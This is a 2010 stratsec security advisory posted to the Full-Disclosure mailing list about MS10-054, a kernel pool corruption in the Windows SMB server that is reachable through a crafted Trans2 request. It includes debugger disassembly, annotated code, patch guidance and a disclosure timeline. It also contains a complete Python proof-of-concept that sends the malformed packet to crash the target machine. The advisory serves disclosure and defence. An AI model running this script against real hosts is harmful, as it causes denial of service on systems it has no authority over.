[<prev] [next>] [day] [month] [year] [list]
Message-ID: <60828CFFDBEBA946AC54D9293505E84D01005E7AE48C@sssydmail01.stratsec.local>
Date: Wed, 11 Aug 2010 09:03:19 +1000
From: stratsec Advisories <advisories@...atsec.net>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: stratsec Security Advisory: SS-2010-007 Microsoft
SMB Server Zero Size Pool Allocation
===============================================================================
stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation
===============================================================================
Title: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation
Version: 1.0
Issue type: Pool Corruption
Affected vendor: Microsoft
Release date: 11/08/2010
Discovered by: Laurent GaffiƩ
Advisory by: Laurent GaffiƩ
Issue status: Patch available
===============================================================================
Summary
-------
A vulnerability in the Windows kernel can be triggered via SMB in Microsoft
Windows versions ranging from Windows 2000 through to Windows 7. This
vulnerability allows an attacker to trigger a kernel pool corruption by sending
a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of
this issue may result in remote code execution with kernel privileges, while
failed attempts will result in a Denial of Service condition.Microsoft has
published a patch to resolve the issue
Technical details
-----------------
The following analysis has been performed on an up-to-date Windows 7 x86-32
system.The issue is triggered by sending a crafted SMB_COM_TRANSACTION2
request:
- The client connects to a SMB server with at least read privileges on this
share.
- The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute
info" with the Max DataCount parameter set to 0.
During processing of the query, SrvSmbQueryFsInformation() from srv.sys will
call NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe
NtQueryVolumeInformationFile allocates a pool chunk with a size taken from an
unverified user input:
kd> nt!NtQueryVolumeInformationFile+0x3de:
82a5779c ff7514 push dword ptr [ebp+14h] ;User controlled
82a5779f 50 push eax
82a577a0 e85d1fe6ff call nt!ExAllocatePoolWithQuotaTag (828b9702)
82a577a5 eb23 jmp nt!NtQueryVolumeInformationFile+0x40c (82a577ca)
kd>
The actual code of the NtQueryVolumeInformationFile function looks like this:
NTSTATUS
NtQueryVolumeInformationFile(IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileSystemInformation,
IN ULONG Length,
IN FS_INFORMATION_CLASS FileSystemInformationClass)
{
if (RequestorMode != KernelMode)
{
}
if (FileSystemInformationClass == FileFsDeviceInformation)
{
}
if (FileSystemInformationClass == FileFsDriverPathInformation)
{
PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source;
Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation;
Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length);
RtlCopyMemory(Buffer, Source, Length);
NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length);
// [...]
if (Buffer) ExFreePool(Buffer);
}
// Issue;
//SystemBuffer, which is the buffer used for the I/O, can be allocated with
//a size of zero because of the lack of length sanity check.
//Later this buffer is used for various operations, which is the source of
//trouble when the I/O Manager tries to release the buffer.
Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool,
Length);
// This buffer is freed later by the Windows I/O Manager.
}
Impact
------
Successful attempts may allow code execution with kernel privileges, failed
attempts will result in a denial of service (B.S.O.D).
Affected products
-----------------
Windows:
- 2000
- XP
- 2003
- Vista
- 2008
- 7
- 2008R2
Proof of concept
----------------
#!/usr/bin/env python
import sys,struct,socket
from socket import *
if len(sys.argv)<=2:
print '#######################################################################'
print '# MS10-054 Proof Of Concept'
print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'
print '#######################################################################\n\n'
sys.exit()
host = str(sys.argv[1]),445
packetnego = "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
def tidpiduidfield(data):
all_=data[28:34]
return all_
def handle(data):
##Chained SMB commands; Session Setup AndX Request,Tree connect
if data[8:10] == "\x72\x00":
sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
print "[+]Session Query sent"
return struct.pack(">i", len(packetsession))+packetsession
##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
if data[8:10] == "\x73\x00":
packetrans = "\x00\x00\x00\x46"
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
packetrans += "\x00\x00\x44\x20\x05\x01"
print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
return packetrans
def run():
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.settimeout(2)
s.send(packetnego)
print "[+]Negotiate Protocol Request sent"
try:
while True:
data = s.recv(1024)
s.send(handle(data))
except Exception:
pass
s.close()
run()
Solution
--------
Apply appropriate security patches published by Microsoft in advisory MS10-054.
Alternatively, configure a firewall to block SMB communications with untrusted
clients.
Response timeline
-----------------
* 11/02/2010 - Vendor notified
* 11/02/2010 - Vendor acknowledges the advisory
* 16/02/2010 - MSRC confirms issue on Windows 7.
* 26/02/2010 - MSRC provide a DC number and confirm the vulnerability across
Windows 2000 to Windows 7.
* 27/02/2010 - MSRC indicates vulnerability is to be categorised as post-auth
on all platforms and ask for confirmation. stratsec responds
with additional information.
* 11/03/2010 - MSRC confirms issue as a remote unauthenticated code execution
issue for pre-Windows Vista platforms and upgrades overall
bulletin severity to Critical
* 12/03/2010 - MSRC plan to release a patch in June 2010
* 30/04/2010 - MSRC push back the update to August 2010. stratsec agree on new
release date.
* 24/07/2010 - MSRC confirm the patch for August.
* 05/08/2010 - MSRC propose to give a vendor statement or review this advisory
* 05/08/2010 - stratsec request the CVE number and advisory link to MSRC, and
provide this advisory for review.
* 09/08/2010 - MSRC confirm the technical details of this advisory, and provide
the CVE and link details.
* 11/08/2010 - This advisory released.
References
----------
* Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx
* CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550
===============================================================================
About stratsec
--------------
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia.
For more information, please visit our website at http://www.stratsec.net/
===============================================================================
--
Message protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists